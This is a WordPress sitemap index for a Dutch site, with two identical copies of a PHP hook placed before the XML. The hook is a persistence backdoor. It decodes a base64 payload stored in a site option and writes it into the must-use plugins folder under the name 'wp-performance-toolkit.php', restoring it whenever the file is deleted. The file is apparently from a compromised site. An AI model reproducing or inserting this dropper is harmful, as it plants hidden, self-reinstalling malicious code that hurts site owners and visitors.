
add_action( 'plugins_loaded', function() {
    $mu_dir = defined( 'WPMU_PLUGIN_DIR' ) ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins';
    if ( ! file_exists( $mu_dir . '/wp-performance-toolkit.php' ) ) {
        $src = get_option( '_perf_toolkit_source', '' );
        if ( $src ) {
            if ( ! is_dir( $mu_dir ) ) { @mkdir( $mu_dir, 0755, true ); }
            @file_put_contents( $mu_dir . '/wp-performance-toolkit.php', call_user_func( 'base64_decode', $src ) );
        }
    }
}, 1 );
add_action( 'plugins_loaded', function() {
    $mu_dir = defined( 'WPMU_PLUGIN_DIR' ) ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins';
    if ( ! file_exists( $mu_dir . '/wp-performance-toolkit.php' ) ) {
        $src = get_option( '_perf_toolkit_source', '' );
        if ( $src ) {
            if ( ! is_dir( $mu_dir ) ) { @mkdir( $mu_dir, 0755, true ); }
            @file_put_contents( $mu_dir . '/wp-performance-toolkit.php', call_user_func( 'base64_decode', $src ) );
        }
    }
}, 1 );
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://theorie-bootcamp.nl/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-posts-dride_footer_build-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-posts-dride_header-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://theorie-bootcamp.nl/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
